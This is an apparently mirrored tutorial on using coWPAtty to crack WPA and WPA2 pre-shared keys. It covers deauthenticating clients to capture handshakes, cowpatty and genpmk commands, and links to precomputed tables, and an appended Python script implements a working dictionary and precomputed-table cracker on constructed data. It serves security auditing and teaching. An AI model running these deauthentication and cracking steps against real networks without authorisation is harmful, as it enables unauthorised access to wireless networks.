coWPAtty for Windows
"coWPAtty is designed to audit the pre-shared key (PSK) selection for WPA networks based on the TKIP protocol." - Joshua Wright.
Project Homepage: http://www.willhackforsushi.com/Cowpatty.html

Local Mirror: Cowpatty-4.0-win32.zip MD5: aa9ead2aacfcc493da3684351425d4c6
coWPAtty Dictionary Attack
Precomputing WPA PMK to crack WPA PSK
coWPAtty Precomputed WPA Attack
coWPAtty Precomputed WPA2 Attack
coWPAtty Tables

coWPAtty Usage:
coWPAtty Dictionary Attack:
To perform the coWPAtty dictionary attack we need to supply the tool with a capture file that includes the WPA four-way handshake (the EAPOL-Key exchange between client and access point), a dictionary file of passphrases to guess with, and the SSID of the network. The handshake itself never carries the PSK; it only provides the nonces, MAC addresses and a MIC against which each candidate passphrase can be verified offline.

In order to collect the four-way handshake you can either wait until a client joins the network or, preferably, force an already-connected client to rejoin by sending it deauthentication frames with a tool like void11 or aireplay, and capture the handshake with something like kismet, ethereal or airodump.
cowpatty -f dict -r wpapsk-linksys.dump -s linksys
As you can see this simple dictionary attack took 51 seconds. Almost all of that time goes into deriving the PMK for each candidate (PBKDF2-HMAC-SHA1 with 4096 iterations, salted with the SSID), which is why the same wordlist runs far slower here than against an unsalted hash. We can speed up this process by precomputing the WPA PMK to crack the WPA PSK (see below).
wpapsk-linksys.dump is the capture containing the four-way handshake
dict is the password file
linksys is the network SSID
Precomputing WPA PMK to crack WPA PSK:
genpmk is used to precompute the hash files, in a similar way to how Rainbow tables are used to pre-hash passwords in Windows LANMan attacks. There is a slight difference however in WPA: the SSID of the network is used as a salt together with the passphrase when the PMK is derived (PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)). This means that we need a different set of hashes for each and every unique SSID, i.e. a set for "linksys", a set for "tsunami", etc. Strictly speaking a genpmk file is a plain lookup table (one PMK stored per passphrase) rather than a reduction-chain rainbow table, so its size grows linearly with the wordlist.
So to generate a hash file for a network using the SSID linksys we use:

genpmk -f dict -d linksys.hashfile -s linksys

dict is the password file
linksys.hashfile is our output file
linksys is the network ESSID
coWPAtty Precomputed WPA Attack:
Now we have created our hash file we can use it against any WPA-PSK network that is utilising the network SSID linksys. Remember the capture (wpapsk-linksys.dump) must contain the four-way handshake to be successful: the precomputed PMKs still have to be combined with the per-session nonces and MAC addresses from the handshake to derive the PTK and check the MIC.
cowpatty -d linksys.hashfile -r wpapsk-linksys.dump -s linksys

wpapsk-linksys.dump is the capture containing the four-way handshake
linksys.hashfile are our precomputed hashes
linksys is the network ESSID

Notice that cracking the WPA-PSK took 0.04 seconds with the precomputed attack as opposed to 200 seconds with standard dictionary attack mode, albeit you do need to precompute the hash files prior to the attack. The PBKDF2 work has simply been moved in front of the engagement; per candidate, only the cheap PTK derivation and MIC comparison remain. Precomputing large hash files for common SSIDs (e.g. linksys, tsunami) would therefore be a sensible move for most penetration testers.
coWPAtty Precomputed WPA2 Attack:
coWPAtty 4.0 is also capable of attacking WPA2 captures. Note: the same hash file as was used with the WPA capture was also used with the WPA2 capture. This works because WPA-PSK and WPA2-PSK derive the PMK from the passphrase and SSID in exactly the same way; they differ only in the later steps (the cipher, and the MIC algorithm over the EAPOL-Key frames: HMAC-MD5 for TKIP, HMAC-SHA1 truncated to 128 bits for CCMP), so one genpmk table covers both.
cowpatty -d linksys.hashfile -r wpa2psk-linksys.dump -s linksys
wpa2psk-linksys.dump is the capture containing the four-way handshake
linksys.hashfile are our precomputed hashes
linksys is the network SSID
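The whole procedure above (dictionary attack, genpmk precomputation, and reuse of one hash file against both a WPA and a WPA2 capture) as an added Python example, not code from the original page or from coWPAtty itself. The MAC addresses, nonces, EAPOL-Key body and wordlist are constructed here rather than taken from a real capture; the only real-world value is the PMK derivation, which follows IEEE 802.11i exactly. It also shows why a linksys table is useless against an SSID of tsunami.

```python
import hashlib
import hmac
from typing import Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK derivation shared by WPA-PSK and WPA2-PSK (IEEE 802.11i):
    PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, amac: bytes, smac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: expands the PMK into a 64-byte PTK using both MACs and both nonces.
    Only the first 16 bytes (the KCK) are needed to verify the handshake MIC."""
    data = min(amac, smac) + max(amac, smac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        msg = b"Pairwise key expansion" + b"\x00" + data + bytes([i])
        out += hmac.new(pmk, msg, hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes, wpa2: bool) -> bytes:
    """MIC over the EAPOL-Key frame (MIC field zeroed). Key descriptor version 1
    (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP) uses HMAC-SHA1 truncated to 16 bytes."""
    if wpa2:
        return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]
    return hmac.new(kck, eapol_frame, hashlib.md5).digest()


def check_pmk(pmk: bytes, hs: dict) -> bool:
    """The per-handshake part of the work: PMK -> PTK -> MIC, compared with the captured MIC."""
    ptk = ptk_from_pmk(pmk, hs["amac"], hs["smac"], hs["anonce"], hs["snonce"])
    return hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"], hs["wpa2"]), hs["mic"])


def valid_passphrase(word: str) -> bool:
    # 802.11i restricts ASCII passphrases to 8..63 characters; anything else cannot be the PSK.
    return 8 <= len(word) <= 63


def dictionary_attack(hs: dict, wordlist) -> Optional[str]:
    """Equivalent of 'cowpatty -f dict': the expensive PBKDF2 step runs once per candidate."""
    for word in wordlist:
        if valid_passphrase(word) and check_pmk(pmk_from_passphrase(word, hs["ssid"]), hs):
            return word
    return None


def genpmk(wordlist, ssid: str) -> list:
    """Equivalent of 'genpmk -f dict -d hashfile -s ssid': PBKDF2 done once per SSID, stored."""
    return [(w, pmk_from_passphrase(w, ssid)) for w in wordlist if valid_passphrase(w)]


def precomputed_attack(hs: dict, table: list) -> Optional[str]:
    """Equivalent of 'cowpatty -d hashfile': only the cheap PTK/MIC step remains per candidate."""
    for word, pmk in table:
        if check_pmk(pmk, hs):
            return word
    return None


def make_handshake(passphrase: str, ssid: str, wpa2: bool) -> dict:
    """Constructed stand-in for a captured four-way handshake (NOT a real capture): fixed MACs,
    nonces and a synthetic EAPOL-Key message 2 body. The MIC is computed from the true
    passphrase so the attacks above have something genuine to verify against."""
    hs = {
        "ssid": ssid, "wpa2": wpa2,
        "amac": bytes.fromhex("001122334455"), "smac": bytes.fromhex("66778899aabb"),
        "anonce": bytes(range(32)), "snonce": bytes(range(32, 64)),
    }
    # EAPOL header + key descriptor fields + SNonce + zeroed MIC/data region (synthetic layout)
    hs["eapol"] = b"\x01\x03\x00\x75" + b"\x02\x01\x0a\x00" + hs["snonce"] + b"\x00" * 77
    pmk = pmk_from_passphrase(passphrase, ssid)
    ptk = ptk_from_pmk(pmk, hs["amac"], hs["smac"], hs["anonce"], hs["snonce"])
    hs["mic"] = eapol_mic(ptk[:16], hs["eapol"], wpa2)
    return hs


# Constructed inputs: a tiny wordlist ("short" is skipped as too short) and three handshakes
# that all use the passphrase "dictionary", two on SSID linksys and one on SSID tsunami.
WORDLIST = ["short", "password", "dictionary", "12345678", "linksys2006"]
HS_WPA = make_handshake("dictionary", "linksys", wpa2=False)
HS_WPA2 = make_handshake("dictionary", "linksys", wpa2=True)
HS_OTHER_SSID = make_handshake("dictionary", "tsunami", wpa2=True)
LINKSYS_TABLE = genpmk(WORDLIST, "linksys")

if __name__ == "__main__":
    print("dictionary attack, WPA capture  :", dictionary_attack(HS_WPA, WORDLIST))
    print("precomputed attack, WPA capture :", precomputed_attack(HS_WPA, LINKSYS_TABLE))
    print("same table, WPA2 capture        :", precomputed_attack(HS_WPA2, LINKSYS_TABLE))
    print("same table, SSID tsunami        :", precomputed_attack(HS_OTHER_SSID, LINKSYS_TABLE))
```

Running it recovers "dictionary" from the WPA capture both ways, recovers it from the WPA2 capture with the same linksys table, and finds nothing for the tsunami handshake, because its PMKs were salted with a different SSID. The pmk_from_passphrase function can be checked against the 802.11i Annex H vector (passphrase "password", SSID "IEEE").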
coWPAtty Tables:
The Church of Wifi have produced some lookup tables for 1000 SSIDs computed against a 170,000 word password file. The resultant tables are approximately 7 Gigabytes in size and can be downloaded via Torrent:

http://torrents.lostboxen.net/co ... atty-4.0_2006-10-19

A 33 Gigabyte set of tables is also available: http://umbra.shmoo.com:6969/

Or you can buy them on DVD, direct from Renderman (initiator of the project): http://www.renderlab.net/projects/WPA-tables/